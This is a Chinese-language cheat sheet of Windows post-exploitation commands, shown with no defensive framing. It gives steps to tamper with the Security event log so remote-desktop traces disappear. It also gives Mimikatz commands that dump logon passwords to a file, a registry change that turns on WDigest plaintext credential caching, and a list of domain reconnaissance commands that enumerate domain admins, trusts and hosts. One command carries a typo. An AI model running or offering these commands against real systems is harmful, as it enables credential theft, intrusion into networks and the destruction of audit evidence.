\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
删除远程桌面日志:
# 导出IP为127.0.0.1的日志到新日志文件
wevtutil epl Security C:\Windows\System32\winevt\Logs\Security_new.evtx /q:"*[EventData[(Data[@Name='IpAddress']='127.0.0.1')]]" /ow:true
# 杀掉eventlog服务
tasklist /svc | findstr "eventlog"
taskkill /F /PID
# 将导出的日志覆盖掉原来的evtx
move /Y C:\Windows\System32\winevt\Logs\Security_new.evtx C:\Windows\System32\winevt\Logs\Security.evtx
# 启动eventlog服务
net start eventlog
Mimikatz 非交互式
打印(输出)mimikatz执行过程的log : mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
读取的密码导出在mimikatz的目录输出到文本 : mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
关闭LSA保护记录密码(需要重启或者注销)reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
域信息收集
查询当前登录域:net session
当前计算机设置的域:net config workstation
判断主域,主域服务器都做时间服务器:net time /domain
不用扫描器的情况下一条命令:for /l %i in (1,1,255) do @ping 192.168.200.%i -w 1 -n 1 | find /i"ttl"
查询同域下的主机:net view /domain
查DC共享:net view \\DC的机器名字
查询指定域用户信息:nser user /domain
查询域用户组:net localgroup /domain
查询指定域用户组:net group 组名 /domain
查看域管理员组:net group "domain admins" /domain
获得企业管理员列表:net group "enterprise admins" /domain
列出域内的机子:net group "domain computers" /domain
登录本机的域管理员: net localgroup administrators /domain
获取域信任信息:nltest /domain_trusts
查看域密码策略:net accounts /domain
获取最近mstsc登录的记录:reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT"